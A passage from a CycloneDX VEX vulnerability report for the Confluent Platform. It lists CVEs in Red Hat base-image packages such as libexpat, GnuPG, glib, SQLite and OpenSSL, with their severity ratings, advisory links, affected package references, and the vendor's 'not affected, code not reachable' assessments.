      "published": "2025-11-25T00:15:47+00:00",
      "updated": "2026-06-17T09:54:28+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2",
          "versions": [
            {
              "version": "2:1.6.37-15.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/libpng@1.6.37-15.el9_8.2?arch=x86_64&distro=redhat-9.8&epoch=2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-66382",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 2.9,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        407
      ],
      "description": "In libexpat through 2.7.3, a crafted file with an approximate size of 2 MiB can lead to dozens of seconds of processing time.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-66382"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/12/02/1"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-66382"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://github.com/libexpat/libexpat/issues/1076"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66382"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-66382"
        }
      ],
      "published": "2025-11-28T07:15:57+00:00",
      "updated": "2026-06-17T09:56:45+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.5.0-6.el9_8.1",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/expat@2.5.0-6.el9_8.1?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-68972",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 4.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:C/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        347
      ],
      "description": "In GnuPG through 2.4.8, if a signed message has \\f at the end of a plaintext line, an adversary can construct a modified message that places additional text after the signed material, such that signature verification of the modified message succeeds (although an \"invalid armor\" message is printed during verification). This is related to use of \\f as a marker to denote truncation of a long plaintext line.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-68972"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-68972"
        },
        {
          "url": "https://github.com/advisories/GHSA-w789-3q45-984r"
        },
        {
          "url": "https://gpg.fail/formfeed"
        },
        {
          "url": "https://media.ccc.de/v/39c3-to-sign-or-not-to-sign-practical-vulnerabilities-i"
        },
        {
          "url": "https://news.ycombinator.com/item?id=46404339"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68972"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-68972"
        }
      ],
      "published": "2025-12-27T23:15:40+00:00",
      "updated": "2026-06-17T09:59:55+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.3.3-5.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/gnupg2@2.3.3-5.el9_7?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-7039",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "cbl-mariner"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        22
      ],
      "description": "A flaw was found in glib. An integer overflow during temporary file creation leads to an out-of-bounds memory access, allowing an attacker to potentially perform path traversal or access private temporary file content by creating symbolic links. This vulnerability allows a local attacker to manipulate file paths and access unauthorized data. The core issue stems from insufficient validation of file path lengths during temporary file operations.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-7039"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-7039"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2392423"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://gitlab.gnome.org/GNOME/glib/-/issues/3716"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7039"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7942-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-7039"
        }
      ],
      "published": "2025-09-03T02:15:38+00:00",
      "updated": "2026-06-17T10:04:08+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "2.68.4-19.el9_8.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/glib2@2.68.4-19.el9_8.2?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-70873",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "bitnami"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.3,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N"
        }
      ],
      "cwes": [
        244
      ],
      "description": "An information disclosure issue in the zipfileInflate function in the zipfile extension in SQLite v3.51.1 and earlier allows attackers to obtain heap memory via supplying a crafted ZIP file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-70873"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-70873"
        },
        {
          "url": "https://gist.github.com/cnwangjihe/f496393f30f5ecec5b18c8f5ab072054"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-70873"
        },
        {
          "url": "https://sqlite.org/forum/forumpost/761eac3c82"
        },
        {
          "url": "https://sqlite.org/src/info/3d459f1fb1bd1b5e"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-70873"
        }
      ],
      "published": "2026-03-12T19:16:15+00:00",
      "updated": "2026-06-17T10:03:26+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8",
          "versions": [
            {
              "version": "3.34.1-10.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:ad4f8351-5c5d-48de-a185-5f5972a09167/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:fadf762c-c5f5-4a84-89f3-3a486bc2c80e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:65150ed1-7919-4ad7-9229-7888767a1c2d/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:a1d58aea-cb62-4a4b-8935-4595174dbb44/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:bb3d6491-840d-4ec4-bf37-d7c8a7f9ad41/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:c53790c4-6b7e-49c3-ae10-848da570d33c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:f3fca7d3-c839-47c9-a2fd-562a4337bd2c/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:abb257bb-c455-4c24-862f-b0423777106e/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:87f3e2df-5303-45c6-9c60-92d0d888ddd7/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        },
        {
          "ref": "urn:cdx:42de411a-d865-481e-889e-bcc3a53e8610/1#pkg:rpm/redhat/sqlite-libs@3.34.1-10.el9_8?arch=x86_64&distro=redhat-9.8"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-9232",
      "ratings": [
        {
          "source": {
            "name": "azure"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        125
      ],
      "description": "Issue summary: An application using the OpenSSL HTTP client API functions may\ntrigger an out-of-bounds read if the 'no_proxy' environment variable is set and\nthe host portion of the authority component of the HTTP URL is an IPv6 address.\n\nImpact summary: An out-of-bounds read can trigger a crash which leads to\nDenial of Service for an application.\n\nThe OpenSSL HTTP client API functions can be used directly by applications\nbut they are also used by the OCSP client functions and CMP (Certificate\nManagement Protocol) client implementation in OpenSSL. However the URLs used\nby these implementations are unlikely to be controlled by an attacker.\n\nIn this vulnerable code the out of bounds read can only trigger a crash.\nFurthermore the vulnerability requires an attacker-controlled URL to be\npassed from an application to the OpenSSL function and the user has to have\na 'no_proxy' environment variable set. For the aforementioned reasons the\nissue was assessed as Low severity.\n\nThe vulnerable code was introduced in the following patch releases:\n3.0.16, 3.1.8, 3.2.4, 3.3.3, 3.4.0 and 3.5.0.\n\nThe FIPS modules in 3.5, 3.4, 3.3, 3.2, 3.1 and 3.0 are not affected by this\nissue, as the HTTP client implementation is outside the OpenSSL FIPS module\nboundary.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-9232"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2025/09/30/5"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-9232"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-032379.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-082556.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-089022.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-253495.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-485750.html"
        },
        {
          "url": "https://cert-portal.siemens.com/productcert/html/ssa-585531.html"
        },
        {
          "url": "https://github.com/advisories/GHSA-76r2-c3cg-f5r9"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/2b4ec20e47959170422922eaff25346d362dcb35"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/654dc11d23468a74fc8ea4672b702dd3feb7be4b"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/7cf21a30513c9e43c4bc3836c237cf086e194af3"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/89e790ac431125a4849992858490bed6b225eadf"
        },
        {
          "url": "https://github.com/openssl/openssl/commit/bbf38c034cdabd0a13330abcc4855c866f53d2e0"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-9232"
        },
        {
          "url": "https://openssl-library.org/news/secadv/20250930.txt"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7786-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-7894-1"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-9232"
        }
      ],
      "published": "2025-09-30T14:15:41+00:00",
      "updated": "2026-07-14T13:18:07+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1",
          "versions": [
            {
              "version": "1:3.5.5-6.el9_8",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:2c363dcc-fd14-43b2-a366-109bc779c49a/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:e759c844-07d9-48bc-85c8-c0f1e28e4ff5/1#pkg:rpm/redhat/openssl@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:56dd70d5-d106-4b0c-b8bd-7cfba90a0db2/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:6dd4f629-5708-4d91-8cc4-e9d80145187c/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
          "ref": "urn:cdx:ad03c606-57a9-441f-8cd9-815d78add967/1#pkg:rpm/redhat/openssl-libs@3.5.5-6.el9_8?arch=x86_64&distro=redhat-9.8&epoch=1"
        },
        {
